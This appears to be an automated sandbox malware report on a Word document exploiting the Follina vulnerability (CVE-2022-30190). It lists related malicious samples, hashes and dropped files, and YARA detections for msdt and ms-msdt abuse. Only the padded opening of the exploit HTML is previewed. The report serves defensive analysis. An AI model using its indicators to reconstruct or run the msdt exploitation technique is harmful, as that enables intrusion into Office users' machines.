                                                                                                                                                                                                                                        J1j2AmKkNE.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        zSBWjvoh2U.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        2aa6hVVLY8.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19wWLwoD14Xo.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        ZZkLH4O0Y3.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        dfqqRjnCV5.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        uaMVRwwuyZ.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        Voicemail Audio Transcription.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        https://qsinet-my.sharepoint.com/:f:/g/personal/psg-president_bratislava_qsi_org/EnFNEJXRAKFCtd-FKWV3uzQBTjm7ODr0PXuior0gvBUXAA?e=1zr4UlGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        attached invoice.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        #U260e voice042456432-121_076_454656_3-2(4).htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        3GgEhpsURO.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        Facturas Pagadas al VencimientoPDF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        https://www.dropbox.com/scl/fi/vx411mbr29t5hn9h338q8/You-have-been-invited-to-view-the-folder-PO986078_30840_89.paper?dl=0&rlkey=7y27s248ly2fxgpkbzj9vrzhmGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        Validation-abuse@ridgelineintl.com.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        SecuriteInfo.com.Win32.Injector.ERYZ.5525.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        SecuriteInfo.com.Win32.Injector.ERYZ.10791.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        (QUOTATION21153590.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        SecuriteInfo.com.W32.AIDetectNet.01.17208.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        SecuriteInfo.com.FileRepMalwareInj.5548.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        Euro Transfer slip.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        AutoUpdater.jsGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        3A5F31399BED412A2B4C2E4A02630FF97D0F3CE104927.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                        • 185.199.109.133
                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:Microsoft Access Database
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):528384
                                                                                                                                                                                                                                        Entropy (8bit):0.4757000931758257
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:KGfXGwX2JCwNR/f/HNvs8SF3fZ0jGB8wTvW6wtZ1Ij+hVZO4Fg:hfXGsmCdHvZyWe6/QI
                                                                                                                                                                                                                                        MD5:CD17EFEF7B2FFAF9A9AA5B66A3ECFBFB
                                                                                                                                                                                                                                        SHA1:9C39FDE7C9A92D372A3EDA777E0E12C4042F37B6
                                                                                                                                                                                                                                        SHA-256:E943911CD0EE1A288605391DDD0D342AE90CB285DB5F6340310370255BAEDFDD
                                                                                                                                                                                                                                        SHA-512:033D8FAF9119EB39224563151161619172B416D1D076646FA2B7CF98DC05ECE6B42907FF9F42159B7D385A23403CA6AF5F5F39FF583ECC6426E578C2DE2C5489
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...NqU.7...1.(....`.:{6....Z.C8..3..y[e.|*..|......#....f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):36
                                                                                                                                                                                                                                        Entropy (8bit):2.730660070105504
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                                                                                                        MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                                                                                                        SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                                                                                                        SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                                                                                                        SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                        Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                                        Entropy (8bit):1.4172860556164644
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:GUfFF/FaV:DtFdu
                                                                                                                                                                                                                                        MD5:C2AC3C4E2F040FECC0C759333329FC5F
                                                                                                                                                                                                                                        SHA1:D60D4854A23808FD2D67A20DDD9001D5567B1F53
                                                                                                                                                                                                                                        SHA-256:F42C7EE07D25E6BCABCFDA1B8EA31928008FDA1A2C51E8D5C08410E6802EF2F3
                                                                                                                                                                                                                                        SHA-512:5EFBE74E618899E05B228FB255CBF20468ED9303723F508202CED231FB0CAD966A92D7F092FC286CA5211EB8F56A0C6EA5CD742D94003064E7C42D92137C9DF8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:855271. Admin.
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):148061
                                                                                                                                                                                                                                        Entropy (8bit):5.358148909393495
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:AcQW/gxgB5BQguwN/Q9DQe+zQTk4F77nXmvid3XxVETLKz61:z1Q9DQe+zuXYr
                                                                                                                                                                                                                                        MD5:B42FC442BE4F5E74973A484FD49F9647
                                                                                                                                                                                                                                        SHA1:C0E027DB870B5724DF5556C69462AB728E664129
                                                                                                                                                                                                                                        SHA-256:66C3D61980CC73F60BDD8E0DEA062F0CC30AD7F37B3CC0B1AE18B98C1CE98AA8
                                                                                                                                                                                                                                        SHA-512:DFE4EFF101B12E9A99882341CF94768A2AD1E67271FB86CAEBA4072A8248721F5C624836DC953EEF62EB7D3F316CB21733C980EB8D943A204189BF48D04ABB11
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-08-18T01:57:02">.. Build: 16.0.15614.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8226
                                                                                                                                                                                                                                        Entropy (8bit):2.4313825008807632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:0WUe4ZX2X2X2X2X2X2X2X2uX2X2X2X2X2X2fdlR1N7GDX4S0VMn:0WUe4hyyyyyyyzyyyyySdCb4S3n
                                                                                                                                                                                                                                        MD5:E70739707D44DAD5084EA7BC0591D68D
                                                                                                                                                                                                                                        SHA1:7C96844A9FE8AC7E1270A7A30F15B07963137AE6
                                                                                                                                                                                                                                        SHA-256:555536B16091930DC53A5D6E66C40E43A440CAF9DE7A620383FBB13AD0144A75
                                                                                                                                                                                                                                        SHA-512:81BD09BE364EDD5F723D2E62B7FB8E2EEA98435EF3E5F3E528263284365D84425F8DA8979C6018494691C8AE794BC74A9A50BCA31D0B07AC17C81A704CF56751
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1BDECE2D.txt, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                                                                        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1BDECE2D.txt, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1BDECE2D.txt, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:<!doctype html>..<html lang="en">..<head>..<title>..Exploit..</title>..</head>..<body>....<script>..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8226
                                                                                                                                                                                                                                        Entropy (8bit):2.4313825008807632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:0WUe4ZX2X2X2X2X2X2X2X2uX2X2X2X2X2X2fdlR1N7GDX4S0VMn:0WUe4hyyyyyyyzyyyyySdCb4S3n
                                                                                                                                                                                                                                        MD5:E70739707D44DAD5084EA7BC0591D68D
                                                                                                                                                                                                                                        SHA1:7C96844A9FE8AC7E1270A7A30F15B07963137AE6
                                                                                                                                                                                                                                        SHA-256:555536B16091930DC53A5D6E66C40E43A440CAF9DE7A620383FBB13AD0144A75
                                                                                                                                                                                                                                        SHA-512:81BD09BE364EDD5F723D2E62B7FB8E2EEA98435EF3E5F3E528263284365D84425F8DA8979C6018494691C8AE794BC74A9A50BCA31D0B07AC17C81A704CF56751
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txt, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                                                                        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txt, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txt, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:<!doctype html>..<html lang="en">..<head>..<title>..Exploit..</title>..</head>..<body>....<script>..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8226
                                                                                                                                                                                                                                        Entropy (8bit):2.4313825008807632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:0WUe4ZX2X2X2X2X2X2X2X2uX2X2X2X2X2X2fdlR1N7GDX4S0VMn:0WUe4hyyyyyyyzyyyyySdCb4S3n
                                                                                                                                                                                                                                        MD5:E70739707D44DAD5084EA7BC0591D68D
                                                                                                                                                                                                                                        SHA1:7C96844A9FE8AC7E1270A7A30F15B07963137AE6
                                                                                                                                                                                                                                        SHA-256:555536B16091930DC53A5D6E66C40E43A440CAF9DE7A620383FBB13AD0144A75
                                                                                                                                                                                                                                        SHA-512:81BD09BE364EDD5F723D2E62B7FB8E2EEA98435EF3E5F3E528263284365D84425F8DA8979C6018494691C8AE794BC74A9A50BCA31D0B07AC17C81A704CF56751
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                                                                        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                                                                                        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:<!doctype html>..<html lang="en">..<head>..<title>..Exploit..</title>..</head>..<body>....<script>..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8226
                                                                                                                                                                                                                                        Entropy (8bit):2.4313825008807632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:0WUe4ZX2X2X2X2X2X2X2X2uX2X2X2X2X2X2fdlR1N7GDX4S0VMn:0WUe4hyyyyyyyzyyyyySdCb4S3n
                                                                                                                                                                                                                                        MD5:E70739707D44DAD5084EA7BC0591D68D
                                                                                                                                                                                                                                        SHA1:7C96844A9FE8AC7E1270A7A30F15B07963137AE6
                                                                                                                                                                                                                                        SHA-256:555536B16091930DC53A5D6E66C40E43A440CAF9DE7A620383FBB13AD0144A75
                                                                                                                                                                                                                                        SHA-512:81BD09BE364EDD5F723D2E62B7FB8E2EEA98435EF3E5F3E528263284365D84425F8DA8979C6018494691C8AE794BC74A9A50BCA31D0B07AC17C81A704CF56751
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<!doctype html>..<html lang="en">..<head>..<title>..Exploit..</title>..</head>..<body>....<script>..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8226
                                                                                                                                                                                                                                        Entropy (8bit):2.4313825008807632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:0WUe4ZX2X2X2X2X2X2X2X2uX2X2X2X2X2X2fdlR1N7GDX4S0VMn:0WUe4hyyyyyyyzyyyyySdCb4S3n
                                                                                                                                                                                                                                        MD5:E70739707D44DAD5084EA7BC0591D68D
                                                                                                                                                                                                                                        SHA1:7C96844A9FE8AC7E1270A7A30F15B07963137AE6
                                                                                                                                                                                                                                        SHA-256:555536B16091930DC53A5D6E66C40E43A440CAF9DE7A620383FBB13AD0144A75
                                                                                                                                                                                                                                        SHA-512:81BD09BE364EDD5F723D2E62B7FB8E2EEA98435EF3E5F3E528263284365D84425F8DA8979C6018494691C8AE794BC74A9A50BCA31D0B07AC17C81A704CF56751
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<!doctype html>..<html lang="en">..<head>..<title>..Exploit..</title>..</head>..<body>....<script>..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8226
                                                                                                                                                                                                                                        Entropy (8bit):2.4313825008807632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:0WUe4ZX2X2X2X2X2X2X2X2uX2X2X2X2X2X2fdlR1N7GDX4S0VMn:0WUe4hyyyyyyyzyyyyySdCb4S3n
                                                                                                                                                                                                                                        MD5:E70739707D44DAD5084EA7BC0591D68D
                                                                                                                                                                                                                                        SHA1:7C96844A9FE8AC7E1270A7A30F15B07963137AE6
                                                                                                                                                                                                                                        SHA-256:555536B16091930DC53A5D6E66C40E43A440CAF9DE7A620383FBB13AD0144A75
